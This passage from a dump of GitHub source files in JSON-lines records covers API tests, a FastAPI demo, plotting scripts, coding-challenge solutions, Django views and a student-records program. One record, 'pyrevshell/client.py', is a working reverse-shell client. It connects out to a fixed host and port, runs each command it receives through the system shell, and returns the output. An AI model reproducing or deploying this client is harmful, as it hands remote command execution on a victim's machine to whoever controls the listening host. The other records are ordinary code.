avwx._call_api('')\n\n\n@mock.patch('met_update.adapters.avwx.get_session')\ndef test_call_api__no_errors__returns_response_data(mock_get_session):\n mock_response = Response()\n mock_response.status_code = 200\n mock_response._content = b'{\"data\": {}}'\n\n mock_session = mock.Mock()\n mock_session.get = mock.Mock(return_value=mock_response)\n\n mock_get_session.return_value = mock_session\n\n result = avwx._call_api('')\n\n assert result == {'data': {}}\n\n\n@mock.patch('met_update.adapters.avwx._call_api')\ndef test_get_taf(mock_call_api):\n airport_icao = 'EHAM'\n avwx.get_taf(airport_icao)\n\n expected_called_url = f'https://avwx.rest/api/taf/EHAM'\n\n mock_call_api.assert_called_once_with(url=expected_called_url)\n\n\n@mock.patch('met_update.adapters.avwx._call_api')\ndef test_get_metar(mock_call_api):\n airport_icao = 'EHAM'\n avwx.get_metar(airport_icao)\n\n expected_called_url = f'https://avwx.rest/api/metar/EHAM'\n\n mock_call_api.assert_called_once_with(url=expected_called_url)\n","repo_name":"eurocontrol-swim/predicted-runway-met-update","sub_path":"tests/adapters/test_avwx.py","file_name":"test_avwx.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6958730246","text":"from fastapi import FastAPI\nfrom fastapi.responses import RedirectResponse\nfrom prisma import Prisma\nfrom prisma.models import Post, User\nfrom faker import Faker\n\n\ndb = Prisma()\napp = FastAPI()\nfake = Faker()\n\n\n@app.on_event(\"startup\")\nasync def startup():\n await db.connect()\n\n if not await db.user.find_first():\n for i in range(1, 5):\n await db.user.create(\n {\n \"id\": i,\n \"name\": fake.name(),\n \"email\": fake.email(),\n \"posts\": {\n \"create\": [\n {\n \"title\": f\"Post {j}\",\n \"content\": fake.paragraph(nb_sentences=5),\n \"published\": True,\n }\n for j in range(1, 5)\n ]\n },\n }\n )\n\n\n@app.on_event(\"shutdown\")\nasync def shutdown():\n await db.disconnect()\n\n\n@app.get(\"/\")\ndef home():\n return RedirectResponse(url=\"/docs\")\n\n\n@app.get(\"/posts\", response_model=list[Post])\nasync def get_posts():\n return await db.post.find_many(include={\"author\": True})\n\n\n@app.get(\"/users\", response_model=list[User])\nasync def get_users():\n return await db.user.find_many(include={\"posts\": True})\n\n\n@app.delete(\"/all\")\nasync def delete_all():\n deleted_posts = await db.post.delete_many()\n deleted_users = await db.user.delete_many()\n\n return {\"Deleted posts\": deleted_posts, \"Deleted users\": deleted_users}\n","repo_name":"AndreasPB/prisma-ssot","sub_path":"py/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28005180019","text":"import mmint_utils\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ncnn_res_fn = \"out/results/cnn_res.pkl.gzip\"\nkp_res_fn = \"out/results/kp_res.pkl.gzip\"\nkp_interp_res_fn = \"out/results/kp_int_res.pkl.gzip\"\n\ncnn_res = mmint_utils.load_gzip_pickle(cnn_res_fn)\nkp_res = mmint_utils.load_gzip_pickle(kp_res_fn)\nkp_interp_res = mmint_utils.load_gzip_pickle(kp_interp_res_fn)\n\nz_angles = np.arange(0.0, np.pi / 2.0, (np.pi / 2.0) / 200)\ncnn_iou = cnn_res['iou']\nkp_iou = kp_res['iou']\nkp_interp_iou = kp_interp_res['iou']\n\nplt.plot(z_angles, cnn_iou, label='CNN-Net')\nplt.plot(z_angles, kp_iou, label='KP-Net')\nplt.plot(z_angles, kp_interp_iou, label='KP-Net 
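The avwx tests above pin down the contract of _call_api without showing its body: it pulls a session from get_session, raises HTTPError on non-2xx responses, and returns the parsed JSON otherwise. A minimal implementation consistent with those assertions (a sketch, not the project's actual code) could be:

import requests

def call_api(session: requests.Session, url: str) -> dict:
    # raise_for_status() raises requests.HTTPError for 4xx/5xx,
    # matching the pytest.raises(HTTPError) expectation above.
    response = session.get(url)
    response.raise_for_status()
    return response.json()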
(Interp.)')\nplt.xlabel(\"Angle\")\nplt.ylabel(\"IoU\")\nplt.legend()\nplt.xlim(0.0, np.pi/2.0)\nplt.ylim(0.0, 1.0)\n\nplt.show()\n","repo_name":"mvandermerwe/object_keypoints","sub_path":"scripts/plotting/plot_interpolation_results.py","file_name":"plot_interpolation_results.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23643310111","text":"input = open(\"C-large.in\",\"r\")\r\noutput = open(\"C-large.out\",\"w\")\r\ntest_cases = int(input.readline())\r\nfor test in range(test_cases):\r\n\tA,B = input.readline().split(\" \")\r\n\tcount = 0\r\n\ts = set()\r\n\t#print \"test\",test\r\n\tn = int(A)\r\n\tb = int(B)\r\n\twhile n < b+1:\r\n\t\tN = str(n)\r\n\t\tfor i in range(len(N)-1):\r\n\t\t\tx = N[i+1:] + N[0:i+1]\r\n\t\t\tif int(A) <= n < int(x) <= int(B):\r\n\t\t\t\ts.add((n,x))\r\n\t\tn += 1\r\n\toutput.write(\"Case #%i: %i\\n\"%(test+1,len(s)))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_97/1363.py","file_name":"1363.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16072982868","text":"#!/usr/bin/env python3\n\nimport re\n\n\"\"\"\n\nhttps://www.hackerrank.com/challenges/ip-address-validation/problem\n\n\nDetermine whether input is IPv4, IPv6, or Neither\n\nIPv4 was the first publicly used Internet Protocol which used 4 byte addresses\nwhich permitted for 2^32 addresses. The typical format of an IPv4 address is\nA.B.C.D where A, B, C and D are Integers lying between\n0 and 255 (both inclusive).\n\nIPv6, with 128 bits, was developed to permit the expansion of the address space.\nTo quote from the linked article: The 128 bits of an IPv6 address are\nrepresented in 8 groups of 16 bits each. Each group is written as\n4 hexadecimal digits and the groups are separated by colons (:).\n\nThe address 2001:0db8:0000:0000:0000:ff00:0042:8329 is an\nexample of this representation.\n\nConsecutive sections of zeros will be left as they are.\nAn IPv6 value such as \"...:0:...\" or \"...:5:...\" is address-wise identical\nto \"...:0000:...\" or \"...:0005:....\". 
Leading zeros may be omitted in\nwriting the address.\n\nSample input:\n3\nThis line has junk text.\n121.18.19.20\n2001:0db8:0000:0000:0000:ff00:0042:8329\n\nSample output:\nNeither\nIPv4\nIPv6\n\n\"\"\"\n\n\ndef classify_ip(ip):\n # This is a proper regex to grep IPv4 Address\n # ^((25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])$\n ipv4_patt = re.compile(r'^\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}$')\n ipv4 = ipv4_patt.match(ip)\n\n ipv6_patt = re.compile(r'^([0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}$')\n ipv6 = ipv6_patt.match(ip)\n\n if ipv4:\n temp = ipv4.group().split(\".\")\n for item in temp:\n x = int(item)\n if x > 255:\n return \"Neither\"\n\n return \"IPv4\"\n\n elif ipv6:\n return \"IPv6\"\n\n else:\n return \"Neither\"\n\n\nif __name__ == \"__main__\":\n\n input_count = int(input())\n\n out = []\n\n for i in range(input_count):\n ip = input()\n out.append(classify_ip(ip))\n\n for i in out:\n print(i)\n","repo_name":"asinggih/coding-challenges","sub_path":"ip_classifier.py","file_name":"ip_classifier.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11303241779","text":"from rest_framework import status\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom .serializer import OrderSerializer, Order_detailSerializer\nfrom main.serializer import HobbySerializer\nfrom user.serializer import SubSerializer, Sub_pdSerializer\nfrom .models import Order, Order_detail, Hobby\nfrom user.models import Subscription, Sub_pd\nfrom rest_framework.exceptions import APIException, AuthenticationFailed\nfrom rest_framework.authentication import get_authorization_header\nfrom user.authentication import create_access_token, create_refresh_token, decode_access_token, decode_refresh_token, access_token_exp\nfrom rest_framework.pagination import PageNumberPagination\nfrom django.db.models import Count\n# Create your views here.\n\nclass OrderAPIView(APIView):\n def get(self, request):\n # 해당 유저 토큰으로 주문정보 필터링 & json직렬화\n order_condition = request.GET.get('type', None)\n\n auth = get_authorization_header(request).split()\n if auth and len(auth) == 2:\n token = auth[1].decode('utf-8')\n id = decode_access_token(token)\n order_obj = Order.objects.filter(o_user=id)\n serializer = OrderSerializer(order_obj, many=True, context={\"request\": request})\n order_data = []\n # 반복할 숫자 선언(num) & 직렬화된 데이터에서 주문id 추출 --> 해당 주문 id의 주문 디테일 id 필터링 & json직렬화 \n if order_condition == 'item':\n \n for order in serializer.data:\n order_pd = Order_detail.objects.filter(od_id=order['id'])\n detail_serializer = Order_detailSerializer(order_pd, many=True, context={\"request\": request})\n detail_serializer = detail_serializer.data\n \n detail_order_data = []\n order_data_obj = {\n \"o_id\" : order['id'],\n \"o_add\" : order['o_add'],\n \"o_num\" : order['o_num'],\n \"o_name\" : order['o_name'],\n \"o_pay\" : order['o_pay'],\n \"o_total_price\" : order['o_total_price'],\n \"o_create\" : order['o_create'],\n \"o_items\" : detail_order_data\n }\n # 반복할 숫자 선언(dict_od_id_num) & 주문 디테일에서 주문한 상품정보 id추출 --> 해당 상품정보 id의 상품 필터링 & json직렬화\n \n for order_pd in detail_serializer:\n \n order_hobby = Hobby.objects.filter(pd_id=order_pd['od_pd'])\n hobby_serializer = HobbySerializer(order_hobby, many=True, context={\"request\": request})\n hobby_serializer = hobby_serializer.data[0]\n\n \n detail_order_data_obj= {\n \"p_id\" : 
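The hand-rolled classifier above pairs a permissive regex with a manual 0-255 range check, and its comment already quotes the stricter all-regex alternative. The standard library offers a third option; note it differs at the edges, since it also accepts compressed IPv6 forms such as '::1', which the eight-group regex above rejects:

import ipaddress

def classify_ip(candidate: str) -> str:
    # ip_address() validates both families, including the 0-255
    # octet range that the regex version checks by hand.
    try:
        address = ipaddress.ip_address(candidate)
    except ValueError:
        return "Neither"
    return "IPv4" if address.version == 4 else "IPv6"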
order_pd[\"od_pd\"],\n \"p_quantity\" : order_pd['od_quantity'],\n \"p_total_price\" : order_pd['od_price'],\n \"p_title\" : hobby_serializer['pd_title'],\n \"p_description\" : hobby_serializer['pd_descrition'],\n \"p_info\" : hobby_serializer['pd_info'],\n \"p_price\" : hobby_serializer['pd_price'],\n \"p_sell\" : hobby_serializer['pd_sell'],\n \"p_create\" : hobby_serializer['pd_create'],\n \"p_image\" : hobby_serializer['images']\n }\n\n detail_order_data.append(detail_order_data_obj)\n if len(detail_serializer) != 0:\n order_data.append(order_data_obj)\n \n \n elif order_condition == 'sub':\n \n for order in serializer.data:\n \n order_pd = Subscription.objects.filter(order_id=order['id'])\n sub_serializer = SubSerializer(order_pd, many=True, context={\"request\": request})\n \n if len(sub_serializer.data) == 0:\n continue\n sub_serializer = sub_serializer.data[0]\n \n subpd = Sub_pd.objects.filter(id=sub_serializer['subpd_id'])\n subpd_serializer = Sub_pdSerializer(subpd, many=True, context={\"request\": request})\n subpd_serializer = subpd_serializer.data[0]\n \n sub_order_data = []\n order_data_obj = {\n \"o_id\" : order['id'],\n \"o_add\" : order['o_add'],\n \"o_num\" : order['o_num'],\n \"o_name\" : order['o_name'],\n \"o_pay\" : order['o_pay'],\n \"o_total_price\" : order['o_total_price'],\n \"o_create\" : order['o_create'],\n \"o_items\" : sub_order_data\n }\n detail_order_data_obj = {\n \"sub_id\" : sub_serializer['id'],\n \"s_id\" : subpd_serializer['id'],\n \"s_title\" : subpd_serializer['title'],\n \"s_body\" : subpd_serializer['body'],\n \"s_price\" : subpd_serializer['price'],\n \"s_sub_image\" : subpd_serializer['sub_image'],\n \"s_create\" : sub_serializer['create_time'],\n \"s_delete\" : sub_serializer['delete_time']\n }\n sub_order_data.append(detail_order_data_obj)\n order_data.append(order_data_obj)\n \n return Response({\n \"order\" : order_data,\n }, status=status.HTTP_200_OK)\n\n else:\n return Response({'message' : \"no auth token, order_condition: \" + order_condition})\n\n def post(self, request):\n paginator = PageNumberPagination()\n order_condition = request.GET.get('type', None)\n\n auth = get_authorization_header(request).split()\n if auth and len(auth) == 2:\n token = auth[1].decode('utf-8')\n id = decode_access_token(token)\n \n order_data = {\n \"o_user\": id, \n \"o_add\": request.data[\"address\"], \n \"o_num\": request.data[\"number\"], \n \"o_name\": request.data[\"name\"], \n \"o_pay\": request.data[\"payment\"], \n \"o_total_price\": request.data[\"totalPrice\"],\n }\n serializer = OrderSerializer(data=order_data)\n if serializer.is_valid():\n current_order = serializer.save()\n\n current_order_id = current_order.id\n \n if order_condition == 'item': #상품 주문시 order post\n\n for item in request.data[\"items\"]:\n od_detail_data = {\n \"od_id\": current_order_id,\n \"od_pd\": item[\"kitItem\"][\"pd_id\"],\n \"od_quantity\": item[\"count\"],\n \"od_price\": item[\"count\"] * item[\"kitItem\"][\"pd_price\"]\n }\n detail_serializer = Order_detailSerializer(data=od_detail_data)\n if detail_serializer.is_valid():\n detail_serializer.save()\n else:\n return Response({'message' : \"Error product id: \" + str(item[\"kitItem\"][\"pd_id\"])})\n return Response(serializer.data, status=status.HTTP_200_OK)\n \n elif order_condition == 'sub':\n \n for sub in request.data[\"items\"]:\n \n od_sub_data = {\n \"order_id\": current_order_id,\n \"subpd_id\": sub[\"id\"],\n \"user_id\": id\n }\n subSerializer = SubSerializer(data=od_sub_data)\n \n if 
subSerializer.is_valid():\n subSerializer.save()\n else:\n return Response({'message' : \"Error subpd_id: \" + str(sub[\"id\"])})\n return Response(serializer.data, status=status.HTTP_200_OK)\n else:\n return Response({'message' : \"no valid order\"})\n \n else:\n return Response({'message' : \"no auth token\"})\n\n\n \n","repo_name":"wodnrP/HobbyDiscovery","sub_path":"order/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43763606275","text":"from rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom batchuploadimages.serializers import ImageSerializer\n\n\n\n\ndef ImageLookup(pk):\n return {'imagefilename': 'imagefilename.jpg', 'image': 'imagedata'}\n\n\n# @api_view(['GET', 'POST'])\n#@api_view(['POST'])\n@csrf_exempt\ndef image_list(request):\n\n if request.method == 'POST':\n return Response({\"message\": \"Got some data!\", \"data\": request.data})\n return Response({\"message\": \"Hello, world!\"})\n \"\"\"\n List all image, or create a new one\n \"\"\"\n\n # GET Request\n #if request.method == 'GET':\n # images = ImageLookup()\n # serializer = ImageSerializer(images)\n # return Response(serializer.data)\n\n # POST Request\n if request.method == 'POST':\n serializer = ImageSerializer(data=request.DATA)\n\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n else:\n return Response(\n serializer.errors, status=status.HTTP_400_BAD_REQUEST\n )\n\n\n#@api_view(['GET', 'PUT', 'DELETE'])\n@csrf_exempt\ndef image_detail(request, pk):\n \"\"\"\n Get, update, or delete a specific image\n \"\"\"\n try:\n image = ImageLookup(pk=pk)\n except:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n # GET request\n if request.method == 'GET':\n serializer = ImageSerializer(image)\n return Response(serializer.data)\n\n # PUT request\n if request.method == 'PUT':\n serializer = ImageSerializer(image, data=request.DATA)\n\n if serializer.is_valid():\n serializer.save()\n return Response(status=status.HTTP_201_CREATED)\n\n else:\n return Response(\n serializer.errors, status=status.HTTP_400_BAD_REQUEST\n )\n\n # DELETE request\n elif request.method == 'DELETE':\n image.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)","repo_name":"RjLi13/bampfa_project","sub_path":"batchuploadimages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39100066128","text":"from domain import * \nimport math\nimport os \n\nclass Input(Student,Course,Mark):\n list_course_name = []\n list_student_name = []\n list_credits = []\n def __init__(self,sid = str(),name = str(),dob = str(),cid = str(),c_name = str(), credits = int(),mark = None):\n Student.__init__(self,sid,name,dob)\n Course.__init__(self,cid,c_name,credits)\n Mark.__init__(self,mark)\n \n def set_sid(self):\n self.sid = input(\"Please enter your student id:\")\n return self.sid\n \n def set_name(self):\n self.name = input(\"Please enter your student name:\")\n Input.list_student_name.append(self.name)\n return self.name\n \n def set_dob(self):\n self.dob = input(\"Please enter your date of birth:\")\n return self.dob\n \n def add_student(self):\n self.num_student = int(input(\"Enter number of 
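The batch-upload views above still read request.DATA, which was removed in Django REST Framework 3.0 in favour of request.data (and with the @api_view decorators commented out, DRF never wraps the request at all). A sketch of the POST branch updated for modern DRF, reusing the ImageSerializer import from that file:

from rest_framework import status
from rest_framework.decorators import api_view
from rest_framework.response import Response

from batchuploadimages.serializers import ImageSerializer

@api_view(['POST'])
def image_list(request):
    # DRF 3.x: request.data replaces the old request.DATA attribute.
    serializer = ImageSerializer(data=request.data)
    if serializer.is_valid():
        serializer.save()
        return Response(serializer.data, status=status.HTTP_201_CREATED)
    return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)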
students :\"))\n for i in range(self.num_student):\n sid = self.set_sid()\n name = self.set_name()\n dob = self.set_dob()\n self.stu_list.append((sid,name,dob))\n with open(\"students.txt\",\"a\") as file:\n file.write(f\"student id : {sid},name : {name},date of birth: {dob}\\n\")\n \n def set_cid(self):\n self.cid = input(\"Please enter your course Id:\")\n return self.cid\n \n def set_course_name(self):\n self.c_name = input(\"Enter course name:\")\n Input.list_course_name.append(self.c_name)\n return self.c_name\n \n def set_credits(self):\n self.credits = int(input(\"Enter credits for this course:\"))\n Input.list_credits.append(self.credits) \n return self.credits\n \n def add_course(self):\n self.num_c = int(input(\"Enter number of courses: \"))\n for i in range(self.num_c):\n cid = self.set_cid()\n course_name = self.set_course_name()\n credits = self.set_credits()\n self.course_list.append((cid,course_name,credits))\n with open(\"courses.txt\",\"a\") as file:\n file.write(f\"course id : {cid},course name : {course_name},numbers of credits : {credits}\\n\")\n \n def set_mark(self,stu_name,course_name):\n mark = float(input())\n mark = math.floor(mark*10)/10\n if mark > 25 or mark < 0 :\n print(\"Error mark input ! too high or too small\")\n return 0 \n else:\n self.mark_dict[(stu_name,course_name)] = mark\n with open(\"marks.txt\",\"a\") as f:\n f.write(f\"in the {course_name}, {stu_name} : {mark}\\n\")\n \n def add_marks(self):\n self.course_name = input(\"Enter the course name that you want to add marks:\")\n if self.course_name not in Input.list_course_name:\n print(\"The course id not exist !\")\n return 0\n else:\n print(f\"for the course {self.course_name} :\")\n for self.stu_name in Input.list_student_name:\n print(f\"Enter the mark for {self.stu_name}:\",end = \" \")\n self.set_mark(self.stu_name,self.course_name)\n print(\"------------------------------------\") \n \nclass Save:\n def compress():\n with open(\"students.dat\",\"a\") as outfile:\n with open(\"students.txt\",\"r\") as infile:\n outfile.write(infile.read())\n outfile.write(\"\\nEnd\\n\")\n with open(\"courses.txt\",\"r\") as infile:\n outfile.write(infile.read())\n outfile.write(\"\\nEnd\\n\")\n with open(\"marks.txt\",\"r\") as infile:\n outfile.write(infile.read())\n outfile.write(\"\\nEnd\\n\")\n os.remove(\"students.txt\")\n os.remove(\"courses.txt\")\n os.remove(\"marks.txt\")\n \nclass Open:\n def decompress():\n print(\"------------------------------------\")\n if os.path.exists(\"students.dat\"):\n with open(\"students.dat\",\"r\") as f:\n print(f.read())\n else:\n print(\"file not found !\")\n\n os.remove(\"student.dat\")","repo_name":"vdh1612/pp2023","sub_path":"pw5/input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":4086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"26464660000","text":"s =\"leEeetcode\"\nl=[]\nl.append(s[0])\n\nfor i in s[1:len(s)]:\n try:\n if l[-1].islower() and i==l[-1].upper(): \n l.pop()\n elif l[-1].isupper() and i==l[-1].lower(): \n l.pop()\n else:\n l.append(i)\n except IndexError:\n l.append(i)\n\nprint(''.join(l))\n","repo_name":"Kshitij269/Questions","sub_path":"Stacks Remove Upper or Lower.py","file_name":"Stacks Remove Upper or Lower.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13693320096","text":"import os\nimport socket\nimport subprocess\nimport sys\n\ndef receiver(s):\n while True:\n 
cmd_bytes = s.recv(4096)\n cmd = cmd_bytes.decode(\"utf-8\")\n if cmd.startswith(\"cd \"):\n os.chdir(cmd[3:])\n s.send(b\"$: \")\n continue\n if len(cmd) > 0:\n p = subprocess.run(cmd, shell=True, capture_output=True)\n data = p.stdout + p.stderr\n s.sendall(data + b\"$: \")\n\ndef connect(address):\n try:\n s = socket.socket()\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n s.connect(address)\n except socket.error:\n sys.exit()\n receiver(s)\n\nif __name__ == \"__main__\":\n host = \"192.168.1.3\"\n port = 19876\n connect((host, port))\n","repo_name":"CxllZ/pyrevshell","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7450058748","text":"import math\nfrom collections import deque, defaultdict\nimport sys\n\nsys.setrecursionlimit(10 ** 6)\n\n\ndef find_parent(parent, a):\n if parent[a] != a:\n parent[a] = find_parent(parent, parent[a])\n return parent[a]\n\n\ndef union_parent(parent, a, b):\n a = find_parent(parent, a)\n b = find_parent(parent, b)\n if a > b:\n parent[a] = b\n elif a < b:\n parent[b] = a\n\n\ndef solution(land, height):\n size = len(land)\n history = [[0 for _ in range(size)] for _ in range(size)] # 그룹 번호 저장\n ladder = defaultdict(lambda: math.inf) # 그룹간의 최소비용 저장\n gr_num = 0\n for a in range(size):\n for b in range(size):\n if history[a][b] != 0:\n continue\n elif history[a][b] == 0:\n gr_num += 1\n queue = deque()\n queue.append((a, b))\n while queue:\n x, y = queue.popleft()\n target = land[x][y]\n if not (0 <= x <= size - 1 and 0 <= y <= size - 1):\n continue\n if history[x][y] != 0:\n continue\n history[x][y] = gr_num\n for dx, dy in [(0, 1), (0, -1), (1, 0), (-1, 0)]:\n nx, ny = x + dx, y + dy\n if 0 <= nx <= size - 1 and 0 <= ny <= size - 1:\n next_target = land[nx][ny]\n gap = abs(next_target - target)\n ngr_num = history[nx][ny]\n if ngr_num != 0 and ngr_num != gr_num:\n ladder[tuple(sorted((gr_num, ngr_num)))] = min(\n ladder[tuple(sorted((gr_num, ngr_num)))], gap\n )\n elif gap <= height:\n queue.append((nx, ny))\n\n answer = 0\n ladder = sorted(ladder.items(), key=lambda x: x[1])\n parent = {i: i for i in range(1, gr_num + 1)}\n for (x, y), cost in ladder:\n if find_parent(parent, x) != find_parent(parent, y):\n union_parent(parent, x, y)\n answer += cost\n if len(parent.values()) == 1:\n break\n\n return answer\n\n\nprint(\n solution([[1, 4, 8, 10], [5, 5, 5, 5], [10, 10, 10, 10], [10, 10, 10, 20]], 3)\n) # 15\nprint(\n solution([[10, 11, 10, 11], [2, 21, 20, 10], [1, 20, 21, 11], [2, 1, 2, 1]], 1)\n) # 18\nprint(solution([[0, 1, 2, 3], [7, 6, 5, 4], [8, 9, 10, 11], [15, 14, 13, 12]], 1)) # 0\nprint(\n solution(\n [\n [1, 1, 5, 5],\n [10, 10, 50, 50],\n [100, 100, 500, 500],\n [1000, 1000, 5000, 5000],\n ],\n 1,\n )\n) # 5443\n\nprint(\n solution(\n [\n [10, 10, 10, 10],\n [1, 30, 5, 10],\n [1, 20, 6, 10],\n [1, 1, 1, 1],\n ],\n 3,\n )\n) # 4\n","repo_name":"lgj9172/algorithm","sub_path":"programers/지형 이동.py","file_name":"지형 이동.py","file_ext":"py","file_size_in_byte":2954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33639355369","text":"def solution(str1, str2):\n str1 = str1.upper() + \".\"\n str2 = str2.upper() + \".\"\n l1 = []\n l2 = []\n d1 = {}\n d2 = {}\n\n for i in range(len(str1) - 1):\n if ('A' <= str1[i] <= 'Z') and ('A' <= str1[i + 1] <= 'Z'):\n tmp = str1[i] + str1[i + 1]\n l1.append(tmp)\n for i in range(len(str2) - 1):\n 
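In the terrain-grouping solution above, the early exit `if len(parent.values()) == 1` can never fire: the parent dict keeps one entry per group forever, so its length is constant. Counting components explicitly gives the intended short-circuit; a sketch of the corrected Kruskal-style loop, using the same names as the solution:

components = gr_num
for (x, y), cost in ladder:
    if find_parent(parent, x) != find_parent(parent, y):
        union_parent(parent, x, y)
        answer += cost
        components -= 1          # one fewer connected component
        if components == 1:      # everything is connected; stop early
            break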
if ('A' <= str2[i] <= 'Z') and ('A' <= str2[i + 1] <= 'Z'):\n tmp = str2[i] + str2[i + 1]\n l2.append(tmp)\n\n for i in range(len(l1)):\n if l1[i] in d1:\n d1[l1[i]] += 1\n else:\n d1[l1[i]] = 1\n for i in range(len(l2)):\n if l2[i] in d2:\n d2[l2[i]] += 1\n else:\n d2[l2[i]] = 1\n l1 = list(set(l1))\n l2 = list(set(l2))\n s = 0 # sum\n a = 0 # and\n for i in range(len(l1)):\n if l1[i] in d1 and l1[i] in d2:\n a += min(d2[l1[i]], d1[l1[i]])\n s += max(d2[l1[i]], d1[l1[i]])\n del d1[l1[i]]\n del d2[l1[i]]\n elif l1[i] in d1 and l1[i] not in d2:\n s += d1[l1[i]]\n del d1[l1[i]]\n for i in range(len(l2)):\n if l2[i] in d2 and l2[i] in d1:\n a += min(d2[l2[i]], d1[l2[i]])\n s += max(d2[l2[i]], d1[l2[i]])\n del d1[l2[i]]\n del d2[l2[i]]\n elif l2[i] in d2 and l2[i] not in d1:\n s += d2[l2[i]]\n del d2[l2[i]]\n if s == 0:\n return 65536\n else:\n answer = int((a / s) * 65536)\n return answer\n\n","repo_name":"tfer2442/myAlgorithm","sub_path":"프로그래머스/lv2/17677. [1차] 뉴스 클러스터링/[1차] 뉴스 클러스터링.py","file_name":"[1차] 뉴스 클러스터링.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37261776618","text":"# Code for visualizing voxels and point clouds.\n\nfrom matplotlib import pyplot\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\nimport pdb\n\ndef plot_3d_points(points, bound=0.5, signed_distances=None):\n fig = pyplot.figure()\n \n ax = fig.add_subplot(111, projection='3d')\n\n if len(points) != 0 and signed_distances is not None:\n ax.scatter(xs=points[:, 0], ys=points[:, 1], zs=points[:, 2], c=signed_distances)\n else:\n ax.scatter(xs=points[:, 0], ys=points[:, 1], zs=points[:, 2])\n\n ax.set_xlabel('X')\n ax.set_ylabel('Y')\n ax.set_zlabel('Z')\n ax.set_title('SDF')\n\n ax.set_xlim3d(-bound, bound)\n ax.set_ylim3d(-bound, bound)\n ax.set_zlim3d(-bound, bound)\n\n pyplot.show()\n\ndef visualize_points_overlay(point_sets, bound=0.5, show=False):\n num_sets = len(point_sets)\n colors = ['red', 'blue', 'yellow', 'orange', 'green']\n assert(num_sets <= len(colors))\n\n fig = pyplot.figure()\n ax = fig.add_subplot(111, projection='3d')\n for i, s in enumerate(range(num_sets)):\n ax.scatter(point_sets[i][:, 0], point_sets[i][:, 1], point_sets[i][:, 2], c=colors[i])\n\n ax.set_xlim3d(-bound, bound)\n ax.set_ylim3d(-bound, bound)\n ax.set_zlim3d(-bound, bound)\n\n pyplot.show()\n\ndef plot_voxel(voxel, img_path=None, voxel_res=(32,32,32)):\n fig = pyplot.figure()\n \n ax = fig.add_subplot(111, projection='3d')\n\n if len(voxel) != 0:\n ax.scatter(voxel[:, 0], voxel[:, 1], voxel[:, 2])\n\n ax.set_xlabel('X')\n ax.set_ylabel('Y')\n ax.set_zlabel('Z')\n ax.set_title('voxel')\n\n if voxel_res is not None:\n ax.set_xlim3d(0, voxel_res[0])\n ax.set_ylim3d(0, voxel_res[1])\n ax.set_zlim3d(0, voxel_res[2])\n \n pyplot.show()\n if img_path is not None:\n pyplot.savefig(img_path)\n\ndef convert_to_sparse_voxel_grid(voxel_grid, threshold=0.5):\n sparse_voxel_grid = []\n voxel_dim = voxel_grid.shape\n for i in xrange(voxel_dim[0]):\n for j in xrange(voxel_dim[1]):\n for k in xrange(voxel_dim[2]):\n if voxel_grid[i, j, k] > threshold:\n sparse_voxel_grid.append([i, j, k])\n return np.asarray(sparse_voxel_grid)\n","repo_name":"mvandermerwe/PointSDF","sub_path":"visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"61"} +{"seq_id":"38506574116","text":"from 
